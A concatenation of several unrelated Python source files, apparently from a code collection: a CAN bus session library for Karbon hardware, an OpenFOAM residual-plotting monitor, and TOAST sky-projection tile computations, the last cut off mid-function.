    # path to json file with trajectory dump
    json_file = ''

    # params
    # target number of successful trajectories per task tuple
    repeats_per_cond = 3
    # consecutive failures allowed before a tuple is flagged impossible
    trials_before_fail = 5
    # successes between reloads of shared on-disk results (parallel mode)
    async_load_every_n_samples = 10
@ex.automain
def main(args):
    """Entry point: resolve the save path, then run generation serially or in parallel."""
    args = helper_util.AttrDict(**args)
    args.save_path = os.path.join(constants.ET_DATA, args.name)
    runner = parallel_generate if args.num_threads > 1 else generate
    runner(args)
|
can.py | # -*- coding: utf-8 -*-
''' Tool for running a session with the can interface.
Example:
.. code-block:: python
import pykarbon.can as pkc
from time import sleep
with pkc.Session() as dev:
dev.write(0x123, 0x11223344) # Send a message
sleep(5) # Your code here!
dev.storedata('can_messages') # Save messages that we receive while we waited
Lets us autodetect the can bus baudrate, write data to the can bus, wait for some messages to
be receive, and finally save those messages to can_messages.csv
'''
from time import sleep, time
import threading
import re
import pykarbon.hardware as pk
# Tools --------------------------------------------------------------------------------------------
def stringify(value):
    ''' Normalize a hex value (int or str) to a bare uppercase hex string.

    Falsy inputs (None, 0, '') yield the empty string, which downstream code
    treats as "no data" (remote frame).
    '''
    if not value:
        return ''
    text = hex(value) if isinstance(value, int) else value
    return text.replace('0x', '').upper()
def hexify(value):
    ''' Coerce a hex value (str or int) to an int; falsy inputs yield 0. '''
    if not value:
        return 0x0
    if isinstance(value, str):
        return int(value.replace('0x', ''), 16)
    return value
# --------------------------------------------------------------------------------------------------
class Session():
    '''Attaches to CAN serial port and allows reading/writing from the port.

    Automatically performs port discovery on linux and windows. Then is able to take
    ownership of a port and perform read/write operations. Also offers an intelligent
    method of sending can messages that will automatically determine frame format, type,
    and data length based only on the message id and data.

    There is additional support for registering a function to certain can data ids. When the
    interface receives a registered message, it will call the function and send the returned
    data. This feature requires running the session with automonitoring enabled.

    By default, the session will also try to automatically discover the bus baudrate.

    Arguments:
        baudrate (int/str, optional):
            `None` -> Disable setting baudrate altogether (use mcu stored value)
            `'autobaud'` -> Attempt to automatically detect baudrate
            `100 - 1000` -> Set the baudrate to the input value, in thousands
        timeout (float, optional): Time until read/write attempts stop in seconds. (None disables)
        automon (bool, optional): Automatically monitor incoming data in the background.
        reaction_poll_delay (float, optional): Time between checking received data for a registered
            value. Decreasing this delay will consume more unused CPU time.

    When 'automon' is set to 'True', this object will immediately attempt to claim the CAN
    connection that it discovers. Assuming the connection can be claimed, the session will then
    start monitoring all incoming data in the background. This data is stored in the session's
    'data' attribute, and can be popped from the queue using the 'popdata' method. Additionally,
    the entire queue may be purged to a csv file using the 'storedata' method -- it is good
    practice to occasionally purge the queue.

    Attributes:
        interface: :class:`pykarbon.hardware.Interface`
        pre_data: Data before it has been parsed by the registry service.
        data: Queue for holding the data read from the port
        isopen: Bool to indicate if the interface is connected
        baudrate: Reports the discovered or set baudrate
        registry: Dict of registered data ids and function responses
        bgmon: Thread object of the bus background monitor
    '''

    def __init__(self, baudrate='autobaud', timeout=.01, automon=True, reaction_poll_delay=.01):
        '''Discovers hardware port name and optionally starts background monitoring.'''
        self.interface = pk.Interface('can', timeout)
        self.poll_delay = reaction_poll_delay
        self.baudrate = None
        self.pre_data = []
        self.data = []
        self.isopen = False
        self.bgmon = None
        self.registry = {}

        if baudrate == 'autobaud':
            self.autobaud(None)
        elif isinstance(baudrate, int):
            self.autobaud(baudrate)

        if automon:
            self.open()
            self.bgmonitor()
        else:
            # Without the registry service running, reads land directly in 'data'
            # (both names alias the same list).
            self.data = self.pre_data

    def __enter__(self):
        if not self.isopen:
            self.interface.__enter__()
            self.isopen = True
        return self

    def open(self):
        '''Claim the interface (only one application may open the serial port)

        Returns:
            True when the interface is open.
        '''
        if not self.isopen:
            self.interface.claim()
            self.isopen = True

        return self.isopen

    def pushdata(self, line: str):
        '''Add data to the end of the session queue.

        NOTE: Strips EoL characters.

        Args:
            line: Data that will be pushed onto the queue
        '''
        self.data.append(line.strip('\n\r'))

    def autobaud(self, baudrate: int) -> str:
        '''Autodetect the bus baudrate

        If the passed argument 'baudrate' is None, the baudrate will be autodetected,
        otherwise, the bus baudrate will be set to the passed value.

        When attempting to auto-detect baudrate, the system will time-out after 3.5 seconds.

        Args:
            baudrate: The baudrate of the bus in thousands. Set to 'None' to autodetect

        Returns:
            The discovered or set baudrate (digits only, as a string), or None.
        '''
        set_rate = None
        with pk.Interface('terminal', timeout=.001) as term:
            if not baudrate:
                term.cwrite('can-autobaud')

                # Poll the terminal until the device reports a rate or we time out.
                start = time()
                elapsed = 0
                set_rate = term.cread()[0].strip('\n\r')
                while not set_rate and elapsed < 3.5:
                    set_rate = term.cread()[0].strip('\n\r')
                    elapsed = time() - start
            else:
                term.cwrite('set can-baudrate ' + str(baudrate))
                set_rate = str(baudrate)

        # Responses look like '... 500k'; pull out just the digits.
        temp = re.search(r'\s(?P<baud>[\d]+)k', set_rate)
        self.baudrate = temp.groupdict()['baud'] if temp else None

        return self.baudrate

    @staticmethod
    def format_message(id, data, **kwargs):
        ''' Takes an id and data and determines other message characteristics

        When keyword arguments are left blank, this function will extrapolate the correct
        frame information based on the characteristics of the passed id and data.
        If desired, all of the automatically determined characteristics may be overwritten.

        Args:
            id: Data id of the message, in hex (0x123, '0x123', '123')
                (NOTE: parameter name shadows the builtin; kept for caller compatibility.)
            data: Message data, in hex -- if 'None', the device will send a remote frame.
                NOTE: Use string version of hex to send leading zeroes ('0x00C2' or '00C2')
            **kwargs:
                *format*: Use standard or extended frame data id ('std' or 'ext')
                *length*: Length of data to be transmitted, in bytes (11223344 -> 4)
                *type*: Type of frame ('remote' or 'data')

        Returns:
            Dict with 'format', 'id', 'length', 'data' and 'type' keys.
        '''
        data = stringify(data)
        message = {
            'format': kwargs.get('format', 'std' if hexify(id) <= 0x7FF else 'ext'),
            'id': stringify(id),
            'length': kwargs.get('length', int(len(data) / 2)),
            'data': data,
            'type': kwargs.get('type', 'data' if data else 'remote')
        }

        return message

    def send_can(self, message) -> str:
        '''Transmits the passed message on the canbus

        Args:
            message: A dictionary containing the data required to build a can message

        Returns:
            The string version of the transmitted message
        '''
        str_message = '{format} {id} {length} {data} {type}'.format(**message)
        self.interface.cwrite(str_message)

        # Encourage io to actually send packets
        sleep(.0001)

        return str_message

    def register(self, data_id, action, **kwargs):
        '''Automatically perform action upon receiving data_id

        Register an action that should be automatically performed when a certain data
        id is read. By default the action will be performed when the id is attached
        to any frame type, and the action's returned data will be checked -- if the data
        can be formatted as a can message, it will automatically be transmitted as a reply.

        Actions should be a python function, which will be automatically wrapped in a
        pykarbon.can.Reactions object by this function. When the passed action is called
        Reactions will try to pass it the hex id and data as the first and second positional
        arguments. If thrown a TypeError, it will call the action without any arguments.

        Example:
            >>> Session.register(0x123, action)

        Note:
            If the frame is a remote request frame, the passed data will be 'remote' instead
            of an int!

        Args:
            data_id: The hex data_id that the action will be registered to
            action: The python function that will be performed.
            kwargs:
                remote_only: Respond only to remote request frames (Default: False)
                run_in_background: Run action as background task (Default: True)
                auto_response: Automatically reply with returned message (Default: True)

        Returns:
            The 'Reaction' object that will be used in responses to this data_id
        '''
        reaction = Reactions(self.write, data_id, action, **kwargs)
        self.registry[data_id] = reaction

        return reaction

    def write(self, can_id, data):
        '''Auto-format and transmit message

        For the large majority of use cases, this is the simplest and best method to send a packet
        of data over the canbus. Only message id and the data need to specified as hex values. All
        other information about the packet will be extrapolated.

        Args:
            can_id: The hex id of the data
            data: The hex formatted data
        '''
        message = self.format_message(can_id, data)
        self.send_can(message)

    def readline(self):
        '''Reads a single line from the port, and stores the output in self.pre_data

        If no data is read from the port, then nothing is added to the queue.

        Returns:
            The data read from the port
        '''
        line = ""
        if self.isopen:
            line = self.interface.cread()[0]
            if line:
                self.pre_data.append(line)

        return line

    def bgmonitor(self):
        '''Start monitoring the canbus in the background

        Uses python threading module to start the monitoring process, plus a second
        thread that services registered reactions.

        Returns:
            The 'thread' object of this background process
        '''
        if not self.data:
            self.data = []

        self.bgmon = threading.Thread(target=self.monitor)
        self.bgmon.start()
        threading.Thread(target=self.registry_service).start()

        return self.bgmon

    def monitor(self):
        '''Watches port for can data while connection is open.

        The loop is predicated on the connection being open; closing the connection will stop the
        monitoring session.

        Returns:
            The method used to stop monitoring. (str)
        '''
        retvl = "SessionClosed"
        while self.isopen:
            try:
                self.readline()
            except KeyboardInterrupt:
                retvl = "UserCancelled"

        return retvl

    def registry_service(self):
        '''Check if received line has a registered action.

        If the received line does have an action, perform it, and then move the data
        into the main data queue. Otherwise, just move the data.
        '''
        while self.isopen:
            # Allow CPU to have time
            sleep(self.poll_delay)
            try:
                line = self.pre_data.pop(0)
                if line:
                    self.check_action(line)
                    self.pushdata(line)
            except IndexError:
                continue

        return 0

    def check_action(self, line):
        '''Check if message has an action attached, and execute if found

        Args:
            line: Can message formatted as [id] [data]
        '''
        try:
            data_id, message = line.strip('\n\r').split(' ')
        except ValueError:
            return

        data_id = int(data_id, 16)
        if data_id in self.registry:
            reaction = self.registry[data_id]
            if reaction.remote_only and ("remote" not in message):
                return
            if reaction.run_in_background:
                reaction.bgstart(message)
            else:
                reaction.start(message)

        return

    def storedata(self, filename: str, mode='a+'):
        '''Pops the entire queue and saves it to a csv.

        This method clears the entire queue: once you have called it, all previously received
        data will no longer be stored in the sessions 'data' attribute. Instead, this data will
        now reside in the specified .csv file.

        Each received can message has its own line of the format: id,data.

        By default, if a file that already exists is specified, the data will append to the end of
        this file. This behavior can be changed by setting 'mode' to any standard 'file.write' mode.

        Args:
            filename: Name of file that will be created.
            mode(str, optional): The file write mode to be used.
        '''
        if '.csv' not in filename:
            filename = filename + '.csv'

        with open(filename, mode) as datafile:
            while True:
                line = self.popdata()
                if not line:
                    break
                line = line.strip('\n\r')
                line = line.replace(' ', ',')
                datafile.write(line + "\n")

    def popdata(self):
        '''If there is data in the queue, pop an entry and return it.

        Uses queue behavior, so data is returned with 'first in first out' logic

        Returns:
            String of the data read from the port. Returns empty string if the queue is empty
        '''
        try:
            out = self.data.pop(0)
        except IndexError:
            out = ""

        return out

    def _await_bgmon(self):
        '''Give the background monitor a moment to exit after isopen is cleared.

        BUGFIX: previously called Thread.isAlive(), which was removed in Python 3.9;
        that raised AttributeError and silently skipped the longer grace period.
        '''
        try:
            if self.bgmon.is_alive():
                sleep(.1)
        except AttributeError:
            # No monitor thread was ever started (automon=False).
            sleep(.001)

    def close(self):
        '''Release the interface so that other sessions may interact with it

        Any existing background monitor session will also be closed. If this session re-opens the
        connection, background monitoring will need to be manually restarted with the 'bgmonitor'
        method.
        '''
        self.isopen = False
        self._await_bgmon()
        self.interface.release()

    def __exit__(self, etype, evalue, etraceback):
        self.isopen = False
        self._await_bgmon()
        self.interface.__exit__(etype, evalue, etraceback)

    def __del__(self):
        if self.isopen:
            self.close()
class Reactions():
    '''Automated response bound to a registered can data id.

    When the wrapped action returns a dict of hex id and data, the reaction
    automatically transmits that id and data as a reply. A 'None' (or falsy)
    id in the dict means "reply using the originating registration's id".

    Note:
        Example action response: {'id': 0x123, 'data': 0x11223344}

    Attributes:
        data_id: The can data id registered with this reaction
        action: Function called by this reaction
        remote_only: If True, only remote request frames trigger the reaction
        run_in_background: If True, the reaction runs on a background thread
        auto_response: If True, the reaction automatically transmits a reply
        canwrite: Helper used to write out can messages
    '''

    def __init__(self, canwrite, data_id, action, **kwargs):
        '''Store the write helper, id, and action; fill option defaults.

        Options not passed via kwargs fall back to their documented defaults.
        '''
        self.canwrite = canwrite
        self.data_id = data_id
        self.action = action

        self.remote_only = kwargs.get('remote_only', False)
        self.run_in_background = kwargs.get('run_in_background', True)
        self.auto_response = kwargs.get('auto_response', True)

    def start(self, hex_data):
        '''Run the action in a blocking manner

        Args:
            hex_data: The hex data of the message that invoked this reaction.
                Should be the string 'remote' for remote frames.
        '''
        if not self.remote_only and ('remote' not in hex_data):
            hex_data = int(hex_data, 16) if hex_data else None

        # Prefer calling with (id, data); fall back to a no-argument call.
        try:
            result = self.action(self.data_id, hex_data)
        except TypeError:
            result = self.action()

        return self.respond(result)

    def bgstart(self, hex_data):
        '''Call start as a background thread

        Returns:
            The thread of the background action
        '''
        worker = threading.Thread(target=self.start, args=[hex_data])
        worker.start()
        return worker

    def respond(self, returned_data):
        '''Automatically respond to frames, if requested

        Args:
            returned_data: A dict of id and data. If falsy, no response is sent
        '''
        if (not returned_data) or (not self.auto_response):
            return

        try:
            reply_id = returned_data['id'] or self.data_id
            self.canwrite(reply_id, returned_data['data'])
        except (TypeError, KeyError) as bad_return:
            print("Bad action response: ", bad_return)

        return
def hardware_reference(device='K300'):
    '''Print useful hardware information about the device

    Displays hardware information about the CAN device, such as pinouts.
    The pinouts assume that the user is facing the front of the device, and
    that the fins are pointed up.

    Args:
        device (str, optional): The karbon series being used. Defaults to the K300
    '''
    ref_k300 = \
    '''
    Info: Compliant with CAN 2.0B. The canbus is not internally terminated; the device
    should be used with properly terminated CAN cables/bus. The termination resistors
    are required to match the nominal impedance of the cable. To meet ISO 11898, this
    resistance should be 120 Ohms.
    Pinout:
    ---------------------
    || 3 | 2 | 1 ||
    || ^ ^ ^ ||
    || |_| |_| |_| ||
    || GND | LOW | HGH ||
    ---------------------
    '''
    # Both currently-supported series share the same CAN hardware reference.
    ref_dict = {
        'K300': ref_k300,
        'K700': ref_k300
    }
    info = ref_dict.get(device.upper())
    if info is None:
        print("Please select from: [K300, K700]")
    else:
        print(info)
|
monitor.py |
import sys
sys.path.append(r"/home/anoldfriend/OpenFOAM/anoldfriend-7/utilities/")
import signal
import multiprocessing as mp
import time
from residual_monitor import read_residuals,plot_multiple_residuals,quit
# --- Residual-monitor configuration -------------------------------------
# Solver log file that residuals are parsed from.
log="run.log"
# Name of the pressure field as it appears in the log.
pressure_name="p_rgh"
# Number of pressure correctors per step, passed to read_residuals.
nCorrectors=1
# Seconds to sleep between polling passes.
interval=5
# Sample size passed to read_residuals on each pass.
sample_size=300
# Alternative field groupings, kept for quick switching:
# m_residuals=[["h"],["Ux","Uy",pressure_name]]
# m_residuals=[["h"],["Ux",pressure_name]]
# Residual fields to plot, one inner list per output figure.
m_residuals=[["h","CO2","O2"]]
# Threshold lines drawn on the residual plots.
m_thresholds=[[1e-1,1e-4,1e-5,1e-6,1e-7]]
# One output image per residual group.
m_save_files=["residuals1.jpg"]
def process_fun():
    """Poll the solver log, re-plot the residuals, sleep, and repeat forever."""
    line_offset=0
    iterations_offset=0
    while True:
        df,line_offset,iterations,info=read_residuals(log,line_offset,pressure_name,nCorrectors,sample_size)
        # Summary quantities may be missing until the log has progressed far
        # enough; fall back to a placeholder string in that case.
        physical_time=info.get("cum_physical_time","not found")
        execution_time=info.get("cum_execution_time","not found")
        delta_time=info.get("latest_delta_time","not found")
        maxCo=info.get("maxCo","not found")
        meanCo=info.get("meanCo","not found")
        title=f"physical time : {physical_time} s, execution time : {execution_time} s"
        # Adjacent f-strings concatenate into one annotation block.
        text=(f"latest_delta_time: {delta_time} s \n"
              f"mean CFL num: {meanCo}\n"
              f"max CFL num: {maxCo}")
        # One identical title/text per residual figure.
        titles=[title]*len(m_residuals)
        texts=[text]*len(m_residuals)
        plot_multiple_residuals(df,iterations_offset,m_residuals,m_thresholds,titles,texts,m_save_files)
        iterations_offset+=iterations
        time.sleep(interval)
if __name__=="__main__":
    try:
        # Install handlers so Ctrl-C / kill shut the monitor down cleanly.
        signal.signal(signal.SIGINT,quit)
        signal.signal(signal.SIGTERM,quit)
        p=mp.Process(target=process_fun)
        # BUG FIX: the original wrote "p.deamon" (a typo, so the flag never
        # took effect) and did so *after* start(); the daemon flag must be
        # spelled "daemon" and assigned before the process starts.
        p.daemon=True
        p.start()
        # Block until the worker exits instead of spinning in a busy loop
        # that pegged a CPU core.
        p.join()
    except Exception as err:
        print(f"Error Message: {err}")
|
toast.py | # -*- mode: python; coding: utf-8 -*-
# Copyright 2013-2021 Chris Beaumont and the AAS WorldWide Telescope project
# Licensed under the MIT License.
"""Computations for the TOAST projection scheme and tile pyramid format.
For all TOAST maps, the north pole is in the dead center of the virtual image
square, the south pole is at all four of its corners, and the equator is a
diamond connecting the midpoints of the four sides of the square. (See Figure 3
of McGlynn+ 2019, DOI:10.3847/1538-4365/aaf79e).
For TOAST maps of the sky, the line of RA (lon) = 0 in the northern hemisphere
extends from the center of the square to the right, as in the Figure 3 mentioned
above. The RA = 90 line goes from the center up, and so on counter-clockwise
around the square.
For TOAST planetary maps, the lon = 0 line in the northern hemisphere extends
from the center of the square to the *left*. The lon = 90 line extends
downwards, and increasing longitude results in counter-clockwise motion around
the square as for sky maps. In other words, the longitudinal orientation is
rotated by 180 degrees.
"""
from __future__ import absolute_import, division, print_function
__all__ = '''
count_tiles_matching_filter
create_single_tile
generate_tiles
generate_tiles_filtered
sample_layer
sample_layer_filtered
Tile
ToastCoordinateSystem
toast_pixel_for_point
toast_tile_area
toast_tile_for_point
toast_tile_get_coords
'''.split()
from collections import namedtuple
from enum import Enum
import numpy as np
from tqdm import tqdm
from ._libtoasty import subsample, mid
from .image import Image
from .pyramid import Pos, tiles_at_depth
# Frequently used angles, in radians.
HALFPI = 0.5 * np.pi
THREEHALFPI = 1.5 * np.pi
TWOPI = 2 * np.pi
def _arclength(lat1, lon1, lat2, lon2):
    """Compute the length of an arc along the great circle defined by spherical
    latitude and longitude coordinates. Inputs and return value are all in
    radians.
    """
    c = np.sin(lat1) * np.sin(lat2) + np.cos(lon1 - lon2) * np.cos(lat1) * np.cos(lat2)
    # Roundoff can push |c| infinitesimally beyond 1 (e.g. for coincident or
    # antipodal points), which would make arccos return NaN; clamp to the
    # valid domain first.
    return np.arccos(np.clip(c, -1.0, 1.0))
def _spherical_triangle_area(lat1, lon1, lat2, lon2, lat3, lon3):
    """Area of the spherical triangle with the given vertices, in steradians.

    Inputs are in radians. Uses the spherical-excess formula from
    https://math.stackexchange.com/a/66731 on the three great-circle side
    lengths. (An implementation on unit vectors rather than lat/lon might
    be faster.)
    """
    # Side lengths opposite each vertex.
    side_c = _arclength(lat1, lon1, lat2, lon2)
    side_a = _arclength(lat2, lon2, lat3, lon3)
    side_b = _arclength(lat3, lon3, lat1, lon1)
    semi = 0.5 * (side_a + side_b + side_c)
    # tan(E/4) in terms of the semiperimeter.
    tan_e4 = np.sqrt(
        np.tan(0.5 * semi)
        * np.tan(0.5 * (semi - side_a))
        * np.tan(0.5 * (semi - side_b))
        * np.tan(0.5 * (semi - side_c))
    )
    return 4 * np.arctan(tan_e4)
class ToastCoordinateSystem(Enum):
    """
    Different TOAST coordinate systems that are in use.

    The two systems differ only by a 180-degree rotation in longitude; see
    the module docstring and ``_create_level1_tiles`` for details.
    """
    ASTRONOMICAL = 'astronomical'
    """The default TOAST coordinate system, where the ``lat = lon = 0`` point
    lies at the middle right edge of the TOAST projection square."""
    PLANETARY = 'planetary'
    """The planetary TOAST coordinate system. This is rotated 180 degrees in
    longitude from the astronomical system, such that the ``lat = lon = 0``
    point lies at the middle left edge of the TOAST projection square."""
# A TOAST tile: *pos* is its pyramid position, *corners* holds the (lon, lat)
# coordinates (radians) of its four corners in UL, UR, LR, LL order, and
# *increasing* records which diagonal the tile is split along when subdivided
# (see _div4 and toast_tile_area).
Tile = namedtuple('Tile', 'pos corners increasing')
# Corner (lon, lat) pairs, given in degrees and converted to radians, for the
# four level-1 tiles of the astronomical coordinate system.
_level1_astronomical_lonlats = np.radians([
    [(0, -90), (90, 0), (0, 90), (180, 0)],
    [(90, 0), (0, -90), (0, 0), (0, 90)],
    [(180, 0), (0, 90), (270, 0), (0, -90)],
    [(0, 90), (0, 0), (0, -90), (270, 0)],
])
# Guard the master array against accidental mutation; planetary users must
# rotate a copy (see _create_level1_tiles).
_level1_astronomical_lonlats.flags.writeable = False
def _create_level1_tiles(coordsys):
    """Return the four level-1 TOAST tiles appropriate for *coordsys*."""
    lonlats = _level1_astronomical_lonlats
    if coordsys == ToastCoordinateSystem.PLANETARY:
        # The planetary system is the astronomical one rotated 180 degrees in
        # longitude; rotate a private copy (the master array is read-only).
        lonlats = lonlats.copy()
        lonlats[..., 0] = (lonlats[..., 0] + np.pi) % TWOPI
    positions = (
        Pos(n=1, x=0, y=0),
        Pos(n=1, x=1, y=0),
        Pos(n=1, x=0, y=1),
        Pos(n=1, x=1, y=1),
    )
    increasing_flags = (True, False, False, True)
    return [
        Tile(pos, corners, inc)
        for pos, corners, inc in zip(positions, lonlats, increasing_flags)
    ]
def toast_tile_area(tile):
    """Calculate the area of a TOAST tile in steradians.

    Parameters
    ----------
    tile : :class:`Tile`
        A TOAST tile.

    Returns
    -------
    The area of the tile in steradians.

    Notes
    -----
    This computation is not very fast. The tile is split into the two
    spherical triangles given by its diagonal, which depends on the
    tile's *increasing* flag.
    """
    ul, ur, lr, ll = tile.corners
    if tile.increasing:
        triangles = ((ul, ur, ll), (ur, lr, ll))
    else:
        triangles = ((ul, ur, lr), (ul, ll, lr))
    total = 0.0
    for v1, v2, v3 in triangles:
        # Corners are (lon, lat); the helper wants (lat, lon).
        total += _spherical_triangle_area(v1[1], v1[0], v2[1], v2[0], v3[1], v3[0])
    return total
def _equ_to_xyz(lat, lon):
    """
    Map equatorial (lat, lon), in radians, onto the unit sphere.

    Note the axis convention: the second component is sin(lat), i.e. the
    polar axis is the middle coordinate.
    """
    cos_lat = np.cos(lat)
    x = np.cos(lon) * cos_lat
    y = np.sin(lat)
    z = np.sin(lon) * cos_lat
    return np.array([x, y, z])
def _left_of_half_space_score(point_a, point_b, test_point):
    """
    A variant of WWT Window's IsLeftOfHalfSpace.

    Instead of the boolean that IsLeftOfHalfSpace returns, produce a number
    <= 0: zero means the test point is *definitely* in the left half-space
    defined by A and B, while a negative value measures how far into the
    right half-space it is. This tolerates the rounding errors that can
    otherwise make a coordinate appear to be contained by *no* tile; in
    those cases the score is something like -1e-16.
    """
    normal = np.cross(point_a, point_b)
    score = np.dot(normal, test_point)
    return min(score, 0)
def _toast_tile_containment_score(tile, lat, lon):
    """
    Assess whether a TOAST tile contains a given point.
    Parameters
    ----------
    tile : :class:`Tile`
        A TOAST tile
    lat : number
        The latitude (declination) of the point, in radians.
    lon : number
        The longitude (RA) of the point, in radians. This value must
        have already been normalied to lie within the range [0, 2pi]
        (inclusive on both ends.)
    Returns
    -------
    A floating-point "containment score" number. If this number is zero, the
    point definitely lies within the tile. Otherwise, the number will be
    negative, with more negative values indicating a greater distance from the
    point to the nearest tile boundary. Due to inevitable roundoff errors, there
    are situations where, given a certain point and tile, the point "should" be
    contained in the tile, but due to roundoff errors, its score will not be
    exactly zero.
    """
    # Derived from ToastTile.IsPointInTile.
    # The root tile covers the whole sphere, so every point is contained.
    if tile.pos.n == 0:
        return 0
    # Note that our labeling scheme is different than that used in WWT proper.
    # At level 1 each tile covers exactly one longitude quadrant, so exact
    # range tests suffice; -100 means "definitely not in this tile".
    if tile.pos.n == 1:
        if lon >= 0 and lon <= HALFPI and tile.pos.x == 1 and tile.pos.y == 0:
            return 0
        if lon > HALFPI and lon <= np.pi and tile.pos.x == 0 and tile.pos.y == 0:
            return 0
        if lon > np.pi and lon < THREEHALFPI and tile.pos.x == 0 and tile.pos.y == 1:
            return 0
        if lon >= THREEHALFPI and lon <= TWOPI and tile.pos.x == 1 and tile.pos.y == 1:
            return 0
        return -100
    # Deeper tiles: the point is contained iff it lies to the left of each
    # great-circle edge while walking the corners in order; each term is 0
    # when definitely inside that half-space and negative otherwise.
    test_point = _equ_to_xyz(lat, lon)
    ul = _equ_to_xyz(tile.corners[0][1], tile.corners[0][0])
    ur = _equ_to_xyz(tile.corners[1][1], tile.corners[1][0])
    lr = _equ_to_xyz(tile.corners[2][1], tile.corners[2][0])
    ll = _equ_to_xyz(tile.corners[3][1], tile.corners[3][0])
    upper = _left_of_half_space_score(ul, ur, test_point)
    right = _left_of_half_space_score(ur, lr, test_point)
    lower = _left_of_half_space_score(lr, ll, test_point)
    left = _left_of_half_space_score(ll, ul, test_point)
    return upper + right + lower + left
def toast_tile_for_point(depth, lat, lon, coordsys=ToastCoordinateSystem.ASTRONOMICAL):
    """
    Identify the TOAST tile at a given depth that contains the given point.
    Parameters
    ----------
    depth : non-negative integer
        The TOAST tile pyramid depth to drill down to. For any given depth,
        there exists a tile containing the input point. As the depth gets
        larger, the precision of the location gets more precise.
    lat : number
        The latitude (declination) of the point, in radians.
    lon : number
        The longitude (RA) of the point, in radians. This value must
        have already been normalized to lie within the range [0, 2pi]
        (inclusive on both ends.)
    coordsys : optional :class:`ToastCoordinateSystem`
        The TOAST coordinate system to use. Default is
        :attr:`ToastCoordinateSystem.ASTRONOMICAL`.
    Returns
    -------
    The :class:`Tile` at the given depth that best contains the specified
    point.
    """
    lon = lon % TWOPI
    # The n=0 tile covers everything; it has no meaningful corner coordinates.
    if depth == 0:
        return Tile(Pos(n=0, x=0, y=0), (None, None, None, None), False)
    # Level-1 containment uses exact longitude-quadrant tests, so for a
    # normalized lon exactly one of the four root tiles scores zero.
    for tile in _create_level1_tiles(coordsys):
        if _toast_tile_containment_score(tile, lat, lon) == 0.:
            break
    while tile.pos.n < depth:
        # Due to inevitable roundoff errors in the tile construction process, it
        # can arise that we find that the point is contained in a certain tile
        # but not contained in any of its children. We deal with this reality by
        # using the "containment score" rather than a binary in/out
        # classification. If no sub-tile has a containment score of zero, we
        # choose whichever tile has the least negative score. In typical
        # roundoff situations that score will be something like -1e-16.
        best_score = -np.inf
        for child in _div4(tile):
            score = _toast_tile_containment_score(child, lat, lon)
            if score == 0.:
                tile = child
                break
            if score > best_score:
                tile = child
                best_score = score
    return tile
def toast_tile_get_coords(tile):
    """
    Get the coordinates of the pixel centers of a TOAST Tile.

    Parameters
    ----------
    tile : :class:`Tile`
        A TOAST tile

    Returns
    -------
    A tuple ``(lons, lats)``, each of which is a 256x256 array of longitudes
    and latitudes of the tile pixel centers, in radians.
    """
    ul, ur, lr, ll = tile.corners
    # Delegate the actual interpolation to the compiled helper.
    return subsample(ul, ur, lr, ll, 256, tile.increasing)
def toast_pixel_for_point(depth, lat, lon, coordsys=ToastCoordinateSystem.ASTRONOMICAL):
    """
    Identify the pixel within a TOAST tile at a given depth that contains the
    given point.
    Parameters
    ----------
    depth : non-negative integer
        The TOAST tile pyramid depth to drill down to. For any given depth,
        there exists a tile containing the input point. As the depth gets
        larger, the precision of the location gets more precise.
    lat : number
        The latitude (declination) of the point, in radians.
    lon : number
        The longitude (RA) of the point, in radians. This value must
        have already been normalized to lie within the range [0, 2pi]
        (inclusive on both ends.)
    coordsys : optional :class:`ToastCoordinateSystem`
        The TOAST coordinate system to use. Default is
        :attr:`ToastCoordinateSystem.ASTRONOMICAL`.
    Returns
    -------
    A tuple ``(tile, x, y)``. The *tile* is the :class:`Tile` at the given depth
    that best contains the specified point. The *x* and *y* values are
    floating-point numbers giving the pixel location within the 256×256 tile.
    The returned values are derived from a quadratic fit to the TOAST
    coordinates of the pixels nearest the specified coordinates *lat* and *lon*.
    """
    tile = toast_tile_for_point(depth, lat, lon, coordsys=coordsys)
    # Now that we have the tile, get its pixel locations and identify the pixel
    # that is closest to the input position.
    lons, lats = toast_tile_get_coords(tile)
    dist2 = (lons - lon)**2 + (lats - lat)**2
    min_y, min_x = np.unravel_index(np.argmin(dist2), (256, 256))
    # Now, identify a postage stamp around that best-fit pixel and fit a biquadratic
    # mapping lat/lon to y/x.
    halfsize = 4
    # Clamp the stamp to the tile edges.
    x0 = max(min_x - halfsize, 0)
    y0 = max(min_y - halfsize, 0)
    x1 = min(min_x + halfsize + 1, 256)
    y1 = min(min_y + halfsize + 1, 256)
    dist2_stamp = dist2[y0:y1,x0:x1]
    lons_stamp = lons[y0:y1,x0:x1]
    lats_stamp = lats[y0:y1,x0:x1]
    flat_lons = lons_stamp.flatten()
    flat_lats = lats_stamp.flatten()
    # Design matrix for a biquadratic in (lon, lat): 1, L, B, L^2, LB, B^2.
    A = np.array([
        flat_lons * 0 + 1,
        flat_lons,
        flat_lats,
        flat_lons**2,
        flat_lons * flat_lats,
        flat_lats**2,
    ]).T
    ygrid, xgrid = np.indices(dist2_stamp.shape)
    # Fit the x and y pixel indices separately against the same design matrix.
    x_coeff, _r, _rank, _s = np.linalg.lstsq(A, xgrid.flatten(), rcond=None)
    y_coeff, _r, _rank, _s = np.linalg.lstsq(A, ygrid.flatten(), rcond=None)
    # Evaluate the polynomial to get the refined pixel coordinates.
    pt = np.array([
        1,
        lon,
        lat,
        lon**2,
        lon * lat,
        lat**2,
    ])
    x = np.dot(x_coeff, pt)
    y = np.dot(y_coeff, pt)
    # The fit coordinates are stamp-relative; shift back to tile coordinates.
    return tile, x0 + x, y0 + y
def _postfix_corner(tile, depth, filter, bottom_only):
    """
    Yield subtiles of a given tile, in postfix (deepest-first) order.

    Parameters
    ----------
    tile : Tile
        Parameters of the current tile.
    depth : int
        The depth to descend to.
    filter : function(Tile)->bool
        A filter function; only tiles for which the function returns True will
        be investigated.
    bottom_only : bool
        If True, only yield tiles at max_depth.
    """
    level = tile[0].n
    # Stop conditions: past the requested depth, or pruned by the filter
    # (level-1 tiles are never filtered out).
    if level > depth:
        return
    if level > 1 and not filter(tile):
        return
    # Recurse into the children first so they are yielded before the parent.
    for child in _div4(tile):
        for descendant in _postfix_corner(child, depth, filter, bottom_only):
            yield descendant
    if not bottom_only or level == depth:
        yield tile
def _div4(tile):
    """Split *tile* into its four child tiles at the next depth."""
    ul, ur, lr, ll = tile.corners
    increasing = tile.increasing
    # Midpoints of the four edges.
    top = mid(ul, ur)
    right = mid(ur, lr)
    bottom = mid(lr, ll)
    left = mid(ll, ul)
    # The center depends on which diagonal this tile is split along.
    if increasing:
        center = mid(ll, ur)
    else:
        center = mid(ul, lr)
    n = tile.pos.n + 1
    x = tile.pos.x * 2
